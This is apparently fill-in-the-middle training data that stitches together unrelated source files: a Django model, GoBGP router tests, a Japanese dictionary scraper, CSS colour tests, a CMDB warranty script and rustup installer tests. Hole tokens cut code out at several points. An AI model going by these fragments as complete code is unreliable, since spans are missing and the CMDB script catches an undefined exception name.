|
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.db import models
from botManager.models import Bot<|fim▁hole|>
class Activist(models.Model):
identifier = models.CharField(max_length=200)
name = models.CharField(max_length=200)
username = models.CharField(max_length=200)
reg_date = models.DateTimeField('Date registered', auto_now_add=True)
bot = models.ForeignKey(Bot) # on_delete=models.CASCADE)
def __str__(self):
return '{} ({}: {})'.format(self.name, self.bot.name, self.identifier)<|fim▁end|>
| |
<|file_name|>bgp_router_test.py<|end_file_name|><|fim▁begin|># Copyright (C) 2015 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
import sys
import time
import unittest
from fabric.api import local
import nose
from lib.noseplugin import OptionParser, parser_option
from lib import base
from lib.base import (
BGP_FSM_IDLE,
BGP_FSM_ACTIVE,
BGP_FSM_ESTABLISHED,
BGP_ATTR_TYPE_MULTI_EXIT_DISC,
BGP_ATTR_TYPE_LOCAL_PREF,
wait_for_completion,
assert_several_times,
)
from lib.gobgp import (
GoBGPContainer,
extract_path_attribute,
)
from lib.quagga import QuaggaBGPContainer
from lib.exabgp import ExaBGPContainer
class GoBGPTestBase(unittest.TestCase):
@classmethod
def setUpClass(cls):
gobgp_ctn_image_name = parser_option.gobgp_image
base.TEST_PREFIX = parser_option.test_prefix
g1 = GoBGPContainer(name='g1', asn=65000, router_id='192.168.0.1',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level)
q1 = QuaggaBGPContainer(name='q1', asn=65001, router_id='192.168.0.2')
q2 = QuaggaBGPContainer(name='q2', asn=65002, router_id='192.168.0.3')
q3 = QuaggaBGPContainer(name='q3', asn=65003, router_id='192.168.0.4')
qs = [q1, q2, q3]
ctns = [g1, q1, q2, q3]
initial_wait_time = max(ctn.run() for ctn in ctns)
time.sleep(initial_wait_time)
for q in qs:
g1.add_peer(q, passwd='passwd')
q.add_peer(g1, passwd='passwd', passive=True)
# advertise a route from q1, q2, q3
for idx, q in enumerate(qs):
route = '10.0.{0}.0/24'.format(idx + 1)
q.add_route(route)
cls.gobgp = g1
cls.quaggas = {'q1': q1, 'q2': q2, 'q3': q3}
# test each neighbor state is turned establish
def test_01_neighbor_established(self):
for q in self.quaggas.itervalues():
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q)
def test_02_check_gobgp_global_rib(self):
for q in self.quaggas.itervalues():
# paths expected to exist in gobgp's global rib
routes = q.routes.keys()
timeout = 120
interval = 1
count = 0
while True:
# gobgp's global rib
state = self.gobgp.get_neighbor_state(q)
self.assertEqual(state, BGP_FSM_ESTABLISHED)
global_rib = [p['prefix'] for p in self.gobgp.get_global_rib()]
for p in global_rib:
if p in routes:
routes.remove(p)
if len(routes) == 0:
break
time.sleep(interval)
count += interval
if count >= timeout:
raise Exception('timeout')
# check gobgp properly add it's own asn to aspath
def test_03_check_gobgp_adj_out_rib(self):
for q in self.quaggas.itervalues():
for path in self.gobgp.get_adj_rib_out(q):
asns = path['aspath']
self.assertTrue(self.gobgp.asn in asns)
# check routes are properly advertised to all BGP speaker
def test_04_check_quagga_global_rib(self):
interval = 1
timeout = int(120 / interval)
for q in self.quaggas.itervalues():
done = False
for _ in range(timeout):
if done:
break
global_rib = q.get_global_rib()
global_rib = [p['prefix'] for p in global_rib]
if len(global_rib) < len(self.quaggas):
time.sleep(interval)
continue
self.assertTrue(len(global_rib) == len(self.quaggas))
for c in self.quaggas.itervalues():
for r in c.routes:
self.assertTrue(r in global_rib)
done = True<|fim▁hole|> if done:
continue
# should not reach here
raise AssertionError
def test_05_add_quagga(self):
q4 = QuaggaBGPContainer(name='q4', asn=65004, router_id='192.168.0.5')
self.quaggas['q4'] = q4
initial_wait_time = q4.run()
time.sleep(initial_wait_time)
self.gobgp.add_peer(q4)
q4.add_peer(self.gobgp)
q4.add_route('10.0.4.0/24')
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q4)
def test_06_check_global_rib(self):
self.test_02_check_gobgp_global_rib()
self.test_04_check_quagga_global_rib()
def test_07_stop_one_quagga(self):
g1 = self.gobgp
q4 = self.quaggas['q4']
q4.stop()
self.gobgp.wait_for(expected_state=BGP_FSM_ACTIVE, peer=q4)
g1.del_peer(q4)
del self.quaggas['q4']
# check gobgp properly send withdrawal message with q4's route
def test_08_check_global_rib(self):
self.test_02_check_gobgp_global_rib()
self.test_04_check_quagga_global_rib()
def test_09_add_distant_relative(self):
q1 = self.quaggas['q1']
q2 = self.quaggas['q2']
q3 = self.quaggas['q3']
q5 = QuaggaBGPContainer(name='q5', asn=65005, router_id='192.168.0.6')
initial_wait_time = q5.run()
time.sleep(initial_wait_time)
for q in [q2, q3]:
q5.add_peer(q)
q.add_peer(q5)
med200 = {'name': 'med200',
'type': 'permit',
'match': '0.0.0.0/0',
'med': 200}
q2.add_policy(med200, self.gobgp, 'out')
med100 = {'name': 'med100',
'type': 'permit',
'match': '0.0.0.0/0',
'med': 100}
q3.add_policy(med100, self.gobgp, 'out')
q5.add_route('10.0.6.0/24')
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q2)
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q3)
q2.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q5)
q3.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q5)
timeout = 120
interval = 1
count = 0
while True:
paths = self.gobgp.get_adj_rib_out(q1, '10.0.6.0/24')
if len(paths) > 0:
path = paths[0]
print "{0}'s nexthop is {1}".format(path['nlri']['prefix'],
path['nexthop'])
n_addrs = [i[1].split('/')[0] for i in self.gobgp.ip_addrs]
if path['nexthop'] in n_addrs:
break
time.sleep(interval)
count += interval
if count >= timeout:
raise Exception('timeout')
def test_10_originate_path(self):
self.gobgp.add_route('10.10.0.0/24')
dst = self.gobgp.get_global_rib('10.10.0.0/24')
self.assertTrue(len(dst) == 1)
self.assertTrue(len(dst[0]['paths']) == 1)
path = dst[0]['paths'][0]
self.assertTrue(path['nexthop'] == '0.0.0.0')
self.assertTrue(len(path['aspath']) == 0)
def test_11_check_adj_rib_out(self):
for q in self.quaggas.itervalues():
paths = self.gobgp.get_adj_rib_out(q, '10.10.0.0/24')
self.assertTrue(len(paths) == 1)
path = paths[0]
peer_info = self.gobgp.peers[q]
local_addr = peer_info['local_addr'].split('/')[0]
self.assertTrue(path['nexthop'] == local_addr)
self.assertTrue(path['aspath'] == [self.gobgp.asn])
def test_12_disable_peer(self):
q1 = self.quaggas['q1']
self.gobgp.disable_peer(q1)
self.gobgp.wait_for(expected_state=BGP_FSM_IDLE, peer=q1)
time.sleep(3)
for route in q1.routes.iterkeys():
dst = self.gobgp.get_global_rib(route)
self.assertTrue(len(dst) == 0)
for q in self.quaggas.itervalues():
if q is q1:
continue
paths = self.gobgp.get_adj_rib_out(q, route)
self.assertTrue(len(paths) == 0)
def test_13_enable_peer(self):
q1 = self.quaggas['q1']
self.gobgp.enable_peer(q1)
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q1)
def test_14_check_adj_rib_out(self):
self.test_11_check_adj_rib_out()
def test_15_check_active_connection(self):
g1 = self.gobgp
g2 = GoBGPContainer(name='g2', asn=65000, router_id='192.168.0.7',
ctn_image_name=self.gobgp.image,
log_level=parser_option.gobgp_log_level)
time.sleep(g2.run())
self.quaggas['g2'] = g2
g2.add_peer(g1, passive=True)
g1.add_peer(g2)
g1.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=g2)
def test_16_check_local_pref_and_med_handling(self):
g1 = self.gobgp
g1.add_route('10.20.0.0/24', local_pref=1000, med=2000)
# iBGP peer
g2 = self.quaggas['g2']
paths = g2.get_global_rib('10.20.0.0/24')
self.assertTrue(len(paths) == 1)
self.assertTrue(len(paths[0]['paths']) == 1)
path = paths[0]['paths'][0]
local_pref = extract_path_attribute(path, BGP_ATTR_TYPE_LOCAL_PREF)
self.assertTrue(local_pref['value'] == 1000)
med = extract_path_attribute(path, BGP_ATTR_TYPE_MULTI_EXIT_DISC)
self.assertTrue(med['metric'] == 2000)
# eBGP peer
q1 = self.quaggas['q1']
paths = q1.get_global_rib('10.20.0.0/24')
self.assertTrue(len(paths) == 1)
path = paths[0]
local_pref = extract_path_attribute(path, BGP_ATTR_TYPE_LOCAL_PREF)
# local_pref's default value is 100
self.assertTrue(local_pref['value'] == 100)
med = extract_path_attribute(path, BGP_ATTR_TYPE_MULTI_EXIT_DISC)
self.assertTrue(med['metric'] == 2000)
def test_17_check_shutdown(self):
g1 = self.gobgp
q1 = self.quaggas['q1']
q2 = self.quaggas['q2']
q3 = self.quaggas['q3']
q2.add_route('20.0.0.0/24')
q3.add_route('20.0.0.0/24')
self.test_01_neighbor_established()
self.test_02_check_gobgp_global_rib()
paths = q1.get_global_rib('20.0.0.0/24')
self.assertEqual(len(paths), 1)
n_addrs = [i[1].split('/')[0] for i in self.gobgp.ip_addrs]
self.assertIn(paths[0]['nexthop'], n_addrs)
q3.stop()
self.gobgp.wait_for(expected_state=BGP_FSM_ACTIVE, peer=q3)
paths = q1.get_global_rib('20.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertIn(paths[0]['nexthop'], n_addrs)
g1.del_peer(q3)
del self.quaggas['q3']
def test_18_check_withdrawal(self):
g1 = self.gobgp
q1 = self.quaggas['q1']
q2 = self.quaggas['q2']
g1.add_route('30.0.0.0/24')
q1.add_route('30.0.0.0/24')
self.test_01_neighbor_established()
self.test_02_check_gobgp_global_rib()
paths = g1.get_adj_rib_out(q1, '30.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertNotIn('source-id', paths[0])
paths = g1.get_adj_rib_out(q2, '30.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertNotIn('source-id', paths[0])
g1.local('gobgp global rib del 30.0.0.0/24')
def f():
paths = g1.get_adj_rib_out(q1, '30.0.0.0/24')
self.assertEqual(len(paths), 0)
paths = g1.get_adj_rib_out(q2, '30.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertEqual(paths[0]['source-id'], '192.168.0.2')
assert_several_times(f)
def test_19_check_grpc_add_neighbor(self):
g1 = self.gobgp
e1 = ExaBGPContainer(name='e1', asn=65000, router_id='192.168.0.7')
time.sleep(e1.run())
e1.add_peer(g1)
self.quaggas['e1'] = e1
n = e1.peers[g1]['local_addr'].split('/')[0]
g1.local('gobgp n add {0} as 65000'.format(n))
g1.add_peer(e1, reload_config=False)
g1.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=e1)
def test_20_check_grpc_del_neighbor(self):
g1 = self.gobgp
e1 = self.quaggas['e1']
n = e1.peers[g1]['local_addr'].split('/')[0]
g1.local('gobgp n del {0}'.format(n))
g1.del_peer(e1, reload_config=False)
def test_21_check_withdrawal_2(self):
g1 = self.gobgp
g2 = self.quaggas['g2']
prefix = '40.10.0.0/24'
g1.add_route(prefix)
wait_for_completion(lambda: len(g1.get_global_rib(prefix)) == 1)
wait_for_completion(lambda: len(g2.get_global_rib(prefix)) == 1)
r = g2.local('gobgp monitor global rib -j', stream=True, tty=False)
g1.local('gobgp global rib del 40.10.0.0/24')
del g1.routes[prefix]
wait_for_completion(lambda: len(g1.get_global_rib(prefix)) == 0)
wait_for_completion(lambda: len(g2.get_global_rib(prefix)) == 0)
ret = json.loads(r.next())
self.assertTrue(ret[0]['nlri']['prefix'] == prefix)
self.assertTrue('withdrawal' in ret[0])
def test_22_check_cli_sorted(self):
g1 = self.gobgp
cnt = 0
def next_prefix():
for i in range(100, 105):
for j in range(100, 105):
yield '{0}.{1}.0.0/24'.format(i, j)
for p in next_prefix():
g1.local('gobgp global rib add {0}'.format(p))
cnt += 1
cnt2 = 0
g = next_prefix()
n = g.next()
for path in g1.local("gobgp global rib", capture=True).split('\n')[1:]:
if [elem for elem in path.split(' ') if elem != ''][1] == n:
try:
cnt2 += 1
n = g.next()
except StopIteration:
break
self.assertTrue(cnt == cnt2)
def test_23_check_withdrawal3(self):
gobgp_ctn_image_name = parser_option.gobgp_image
g1 = self.gobgp
g3 = GoBGPContainer(name='g3', asn=65006, router_id='192.168.0.8',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level)
g4 = GoBGPContainer(name='g4', asn=65007, router_id='192.168.0.9',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level)
initial_wait_time = max(ctn.run() for ctn in [g3, g4])
time.sleep(initial_wait_time)
self.quaggas = {'g3': g3, 'g4': g4}
g3.local('gobgp global rib add 50.0.0.0/24')
g1.add_peer(g3, passive=True)
g3.add_peer(g1)
g1.add_peer(g4, passive=True)
g4.add_peer(g1)
self.test_01_neighbor_established()
self.test_02_check_gobgp_global_rib()
g4.local('gobgp global rib add 50.0.0.0/24 med 10')
paths = g1.get_adj_rib_out(g3, '50.0.0.0/24')
self.assertTrue(len(paths) == 0)
paths = g1.get_adj_rib_out(g4, '50.0.0.0/24')
self.assertTrue(len(paths) == 1)
self.assertTrue(paths[0]['source-id'] == '192.168.0.8')
g3.local('gobgp global rib del 50.0.0.0/24')
paths = g1.get_adj_rib_out(g3, '50.0.0.0/24')
self.assertTrue(len(paths) == 1)
self.assertTrue(paths[0]['source-id'] == '192.168.0.9')
paths = g1.get_adj_rib_out(g4, '50.0.0.0/24')
self.assertTrue(len(paths) == 0)
if __name__ == '__main__':
output = local("which docker 2>&1 > /dev/null ; echo $?", capture=True)
if int(output) is not 0:
print "docker not found"
sys.exit(1)
nose.main(argv=sys.argv, addplugins=[OptionParser()],
defaultTest=sys.argv[0])<|fim▁end|>
| |
<|file_name|>getDetail.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*-
#html_doc = '''<div><a href="http://www.weblio.jp/content/%E5%BD%A2%E5%AE%B9%E5%8B%95%E8%A9%9E" title="形容動詞の意味" class=crosslink>形容動詞</a>「<a href="http://www.weblio.jp/content/%E3%82%A2%E3%83%BC%E3%83%86%E3%82%A3%E3%83%95%E3%82%A3%E3%82%B7%E3%83%A3%E3%83%AB" title="アーティフィシャルの意味" class=crosslink>アーティフィシャル</a>だ」が、<a href="http://www.weblio.jp/content/%E6%8E%A5%E5%B0%BE%E8%AA%9E" title="接尾語の意味" class=crosslink>接尾語</a>「さ」により<a href="http://www.weblio.jp/content/%E4%BD%93%E8%A8%80" title="体言の意味" class=crosslink>体言</a>化した形。<br><br class=nhgktD><div><!--AVOID_CROSSLINK--><p class=nhgktL>終止形</p><p class=nhgktR>アーティフィシャルだ <a href="http://www.weblio.jp/content/%E3%82%A2%E3%83%BC%E3%83%86%E3%82%A3%E3%83%95%E3%82%A3%E3%82%B7%E3%83%A3%E3%83%AB" title="アーティフィシャル">» 「アーティフィシャル」の意味を調べる</a></p><!--/AVOID_CROSSLINK--><br class=clr></div>'''
#from bs4 import BeautifulSoup
#soup = BeautifulSoup(html_doc, 'html.parser')
#a = [text for text in soup.stripped_strings]
#print ''.join(a[:-1])
import socket
import urllib2
import traceback
import re
#import MySQLdb
import time
from bs4 import BeautifulSoup
#from complainDetail import *
timeout = 10
socket.setdefaulttimeout(timeout)
def fetchDetail(link, word):
tryNum = 3
tn = 0
while tn < tryNum:
details = []
try:
f = urllib2.urlopen(link)
content = f.read()
soup = BeautifulSoup(content, 'html.parser')
main = soup.find(attrs={'class':'Nhgkt'})
left = soup.find_all(attrs={'class':'nhgktL'})
right = soup.find_all(attrs={'class':'nhgktR'})
if(left):
for text in main.stripped_strings:
if(re.match(u'終止形$', text)!=None):break
details.append(text)
print '#'.join(details).encode('utf8'),
print '%',left[0].string.encode('utf8'), ':', <|fim▁hole|> aList = right[0].find_all('a')
for a in aList:
print a['title'].encode('utf8'),
print
else:
for text in main.stripped_strings:
if(u'»' in text):break
details.append(text)
print '#'.join(details).encode('utf8')
break
except Exception,e:
print e
tn = tn + 1
#print url, " access error!"
#print "try ", tn, "time"
time.sleep(5)
if tn==tryNum:
#print "Cannot fetch page!"
return -1
return 0
if __name__ == "__main__":
wordsUrlList = open('verb_ok.txt')
for line in wordsUrlList.readlines():
l = line.split(' ')
link = l[0]
word = l[1].strip('\n')
print word, '%', link, '%',
if(fetchDetail(link, word)==-1):
print link, word, "ERROR."
print "Finished"
#indexUrl = "http://www.weblio.jp/category/dictionary/nhgkt/aa"
#f = urllib2.urlopen(indexUrl)
#content = f.read()
#soup = BeautifulSoup(content, 'html.parser')
#urlTable = soup.find(attrs={'class':'kanaAlpha'})
#aList = urlTable.find_all('a')
#for a in aList:
# print '"'+a['href']+'",'<|fim▁end|>
| |
<|file_name|>test-Hex to Safe Color.js<|end_file_name|><|fim▁begin|>munit( 'Rule Compression.Hex to Safe Color', function( assert ) {
assert.exists( "Table", CSSCompressor.tables[ 'Hex to Safe Color' ] );
testRule( assert, 'Hex to Safe Color', [
{
name: 'Basic',
actual: '#000080',
expected: 'navy'
},
{
name: 'Basic Uppercase',
actual: '#c0c0c0',
expected: 'silver'
},
{
name: 'Unsafe Color',
actual: '#f0ffff',<|fim▁hole|>
{
name: 'No Conversion',
actual: '#f02de5',
expected: undefined
}
]);
});<|fim▁end|>
|
expected: undefined
},
|
<|file_name|>getcmdbinfo.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python<|fim▁hole|>
#auth: asher
#date: 20171027
#purpose: get usefulinfo from jsonfile
import ConfigParser
import time
import datetime
import requests
import fileinput
import sys
import os
import codecs
import json
import getWarranty
reload(sys)
sys.setdefaultencoding( "utf-8" )
def getConfig():
"""
将通用的一些数据读取放在一个函数里。不再每个函数里去写一遍了。
"""
global cmdbpath
global idccontactinfoJson,iprangesJson,itemsJson,serverJson,dellserverjson
fileName = os.path.abspath(__file__)
binPath = os.path.dirname(os.path.realpath(__file__))
basePath = os.path.dirname(binPath)
confPath = basePath + '/config/'
# print confPath
conf = ConfigParser.ConfigParser()
conf.read("%s/cmdb.ini" % confPath)
#####
cmdbpath = conf.get('getcmdbinfo','cmdbpath')
# JsonFilesPath = basePath + '/files/'
if not os.path.isdir(cmdbpath):
os.mkdir(cmdbpath)
#idccontactinfo = idccontactinfo.json
idccontactinfoJson = cmdbpath + conf.get('getcmdbinfo','idccontactinfo')
iprangesJson = cmdbpath + conf.get('getcmdbinfo','ipranges')
itemsJson = cmdbpath + conf.get('getcmdbinfo','items')
serverJson = cmdbpath + conf.get('getcmdbinfo','serverinfosforidcmaintain')
dellserverjson = cmdbpath + conf.get('getcmdbinfo','dellserverjson')
def cmdbServer(stg):
##通过传入的stg,返回服务器相关的信息和idc信息
newdict = {}
getConfig()
with open(serverJson,'r') as f:
serverinfor = json.loads(f.read())
if serverinfor.has_key(stg):
dicts = serverinfor[stg]
newdict['item_id'] = dicts['item_id']
#hostname:HN-dl8
newdict['hostname'] = dicts['hostname']
#status:项目专属
newdict['status'] = dicts['status']
#idc_id:海宁
newdict['idc_id'] = dicts['idc_id']
#floor:3
newdict['floor'] = dicts['floor']
#cabinet:K08
newdict['cabinet'] = dicts['cabinet']
#cabinet_pos:10
newdict['cabinet_pos'] = dicts['cabinet_pos']
return newdict
def idcContact(stg):
##得到所有idc信息,这是通过stg
##用法:
#iddc = idcContact(stg1)
#for k,v in iddc.items():
# print k,v
idcnew = {}
getConfig()
stg1 = stg
try:
dicts = cmdbServer(stg1)
idcid = u'%s' % dicts['idc_id'].encode('UTF-8')
with open(idccontactinfoJson,'r') as f:
#idcInf = json.loads(f.read(),encoding='utf-8')
idcInf = json.loads(f.read())
if idcInf.has_key(idcid):
idcnew['tel'] = idcInf[idcid]['tel']
idcnew['address'] = idcInf[idcid]['address']
idcnew['name'] = idcInf[idcid]['name']
#return idcInf[idcid]
return idcnew
except:
pass
def dellServerInfo(stg):
"""
通过本地已有的库去查找已从dell网站下载下来的服务器的保修过报情况
"""
dells = {}
getConfig()
stg1 = stg
with open(dellserverjson,'r') as f:
dellInf = json.loads(f.read())
if dellInf.has_key(stg1):
dells['MachineDescription'] = dellInf[stg1]['MachineDescription']
dells['StartDate'] = dellInf[stg1]['StartDate']
dells['EndDate'] = dellInf[stg1]['EndDate']
expiretime = dells['EndDate']
nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
expire1 = datetime.datetime.strptime(expiretime,"%Y-%m-%d %H:%M:%S")
nowtime1 = datetime.datetime.strptime(nowtime,"%Y-%m-%d %H:%M:%S")
remaintime = str(expire1 - nowtime1).split('days')[0]
dells['RemainDays'] = remaintime
dells['ServiceLevelDescription'] = dellInf[stg1]['ServiceLevelDescription']
return dells
else:
try:
newinfos = getWarranty.getDellExpires(stg)
dells['MachineDescription'] = newinfos['MachineDescription']
dells['StartDate'] = newinfos['StartDate']
dells['EndDate'] = newinfos['EndDate']
expiretime = dells['EndDate']
nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
expire1 = datetime.datetime.strptime(expiretime,"%Y-%m-%d %H:%M:%S")
nowtime1 = datetime.datetime.strptime(nowtime,"%Y-%m-%d %H:%M:%S")
remaintime = str(expire1 - nowtime1).split('days')[0]
dells['RemainDays'] = remaintime
dells['ServiceLevelDescription'] = newinfos['ServiceLevelDescription']
bigdicts = {}
bigdicts[stg1] = dells
getWarranty.writedict2json(bigdicts,dellserverjson)
return dells
except TypeError:
pass
except NoneType:
pass
#import getWarranty
if __name__ == '__main__':
#stg1 = 'H1LMKY1'
stg1 = 'JRQMKY1'
# stg1 = '6298JY1'
dic = cmdbServer(stg1)
#print dicts
if dic:
for k,v in dic.items():
print k,v
iddc = idcContact(stg1)
if iddc:
for k,v in iddc.items():
print k,v
dellcs = dellServerInfo(stg1)
if dellcs:
for k,v in dellcs.items():
print k,v<|fim▁end|>
|
#coding: utf-8
|
<|file_name|>cli-inst-interactive.rs<|end_file_name|><|fim▁begin|>//! Tests of the interactive console installer
pub mod mock;
use crate::mock::clitools::{
self, expect_ok, expect_stderr_ok, expect_stdout_ok, set_current_dist_date, this_host_triple,
Config, SanitizedOutput, Scenario,
};
use crate::mock::{get_path, restore_path};
use lazy_static::lazy_static;
use rustup::utils::raw;
use std::fs;
use std::io::Write;
use std::process::Stdio;
use std::sync::Mutex;
macro_rules! for_host {
($s: expr) => {
&format!($s, this_host_triple())
};
}
pub fn setup_(complex: bool, f: &dyn Fn(&Config)) {
let scenario = if complex {
Scenario::UnavailableRls
} else {
Scenario::SimpleV2
};
clitools::setup(scenario, &|config| {
// Lock protects environment variables
lazy_static! {
static ref LOCK: Mutex<()> = Mutex::new(());
}
let _g = LOCK.lock();
// An windows these tests mess with the user's PATH. Save
// and restore them here to keep from trashing things.
let saved_path = get_path();
let _g = scopeguard::guard(saved_path, restore_path);
f(config);
});
}
pub fn setup(f: &dyn Fn(&Config)) {
setup_(false, f)
}
fn run_input(config: &Config, args: &[&str], input: &str) -> SanitizedOutput {
run_input_with_env(config, args, input, &[])
}
fn run_input_with_env(
config: &Config,
args: &[&str],
input: &str,
env: &[(&str, &str)],
) -> SanitizedOutput {
let mut cmd = clitools::cmd(config, args[0], &args[1..]);
clitools::env(config, &mut cmd);
for (key, value) in env.iter() {
cmd.env(key, value);
}
cmd.stdin(Stdio::piped());
cmd.stdout(Stdio::piped());
cmd.stderr(Stdio::piped());
let mut child = cmd.spawn().unwrap();
child
.stdin
.as_mut()
.unwrap()
.write_all(input.as_bytes())
.unwrap();
let out = child.wait_with_output().unwrap();
SanitizedOutput {
ok: out.status.success(),
stdout: String::from_utf8(out.stdout).unwrap(),
stderr: String::from_utf8(out.stderr).unwrap(),
}
}
#[test]
fn smoke_test() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "\n\n");
assert!(out.ok);
});
}
#[test]
fn update() {
setup(&|config| {
run_input(config, &["rustup-init"], "\n\n");
let out = run_input(config, &["rustup-init"], "\n\n");
assert!(out.ok, "stdout:\n{}\nstderr:\n{}", out.stdout, out.stderr);
});
}
// Testing that the right number of blank lines are printed after the
// 'pre-install' message and before the 'post-install' message.
#[test]
fn blank_lines_around_stderr_log_output_install() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "\n\n");
// During an interactive session, after "Press the Enter
// key..." the UI emits a blank line, then there is a blank
// line that comes from the user pressing enter, then log
// output on stderr, then an explicit blank line on stdout
// before printing $toolchain installed
assert!(out.stdout.contains(
r"
3) Cancel installation
>
stable installed - 1.1.0 (hash-stable-1.1.0)
Rust is installed now. Great!
"
));
});
}
#[test]
fn blank_lines_around_stderr_log_output_update() {
setup(&|config| {
run_input(config, &["rustup-init"], "\n\n");
let out = run_input(
config,
&["rustup-init", "--no-update-default-toolchain"],
"\n\n",
);
println!("-- stdout --\n {}", out.stdout);
println!("-- stderr --\n {}", out.stderr);
assert!(out.stdout.contains(
r"
3) Cancel installation
>
Rust is installed now. Great!
"
));
});<|fim▁hole|>}
#[test]
fn user_says_nope() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "n\n\n");
assert!(out.ok);
assert!(!config.cargodir.join("bin").exists());
});
}
#[test]
fn with_no_modify_path() {
setup(&|config| {
let out = run_input(config, &["rustup-init", "--no-modify-path"], "\n\n");
assert!(out.ok);
assert!(out
.stdout
.contains("This path needs to be in your PATH environment variable"));
if cfg!(unix) {
assert!(!config.homedir.join(".profile").exists());
}
});
}
#[test]
fn with_no_toolchain() {
setup(&|config| {
let out = run_input(config, &["rustup-init", "--default-toolchain=none"], "\n\n");
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "no active toolchain");
});
}
#[test]
fn with_non_default_toolchain() {
setup(&|config| {
let out = run_input(
config,
&["rustup-init", "--default-toolchain=nightly"],
"\n\n",
);
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "nightly");
});
}
#[test]
fn with_non_release_channel_non_default_toolchain() {
setup(&|config| {
let out = run_input(
config,
&["rustup-init", "--default-toolchain=nightly-2015-01-02"],
"\n\n",
);
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "nightly");
expect_stdout_ok(config, &["rustup", "show"], "2015-01-02");
});
}
#[test]
fn set_nightly_toolchain() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "2\n\nnightly\n\n\n\n\n");
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "nightly");
});
}
#[test]
fn set_no_modify_path() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "2\n\n\n\nno\n\n\n");
assert!(out.ok);
if cfg!(unix) {
assert!(!config.homedir.join(".profile").exists());
}
});
}
#[test]
fn set_nightly_toolchain_and_unset() {
setup(&|config| {
let out = run_input(
config,
&["rustup-init"],
"2\n\nnightly\n\n\n2\n\nbeta\n\n\n\n\n",
);
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "beta");
});
}
#[test]
fn user_says_nope_after_advanced_install() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "2\n\n\n\n\nn\n\n\n");
assert!(out.ok);
assert!(!config.cargodir.join("bin").exists());
});
}
#[test]
fn install_with_components() {
fn go(comp_args: &[&str]) {
let mut args = vec!["rustup-init", "-y"];
args.extend_from_slice(comp_args);
setup(&|config| {
expect_ok(config, &args);
expect_stdout_ok(
config,
&["rustup", "component", "list"],
"rust-src (installed)",
);
expect_stdout_ok(
config,
&["rustup", "component", "list"],
&format!("rust-analysis-{} (installed)", this_host_triple()),
);
})
}
go(&["-c", "rust-src", "-c", "rust-analysis"]);
go(&["-c", "rust-src,rust-analysis"]);
}
#[test]
fn install_forces_and_skips_rls() {
setup_(true, &|config| {
set_current_dist_date(config, "2015-01-01");
let out = run_input(
config,
&[
"rustup-init",
"--profile",
"complete",
"--default-toolchain",
"nightly",
],
"\n\n",
);
assert!(out.ok);
assert!(out
.stderr
.contains("warning: Force-skipping unavailable component"));
});
}
#[test]
fn test_warn_if_complete_profile_is_used() {
setup(&|config| {
expect_stderr_ok(
config,
&["rustup-init", "-y", "--profile", "complete"],
"warning: downloading with complete profile",
);
});
}
fn create_rustup_sh_metadata(config: &Config) {
let rustup_dir = config.homedir.join(".rustup");
fs::create_dir_all(&rustup_dir).unwrap();
let version_file = rustup_dir.join("rustup-version");
raw::write_file(&version_file, "").unwrap();
}
#[test]
fn test_prompt_fail_if_rustup_sh_already_installed_reply_nothing() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init"], "\n");
assert!(!out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn test_prompt_fail_if_rustup_sh_already_installed_reply_no() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init"], "no\n");
assert!(!out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn test_prompt_succeed_if_rustup_sh_already_installed_reply_yes() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init"], "yes\n\n\n");
assert!(out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
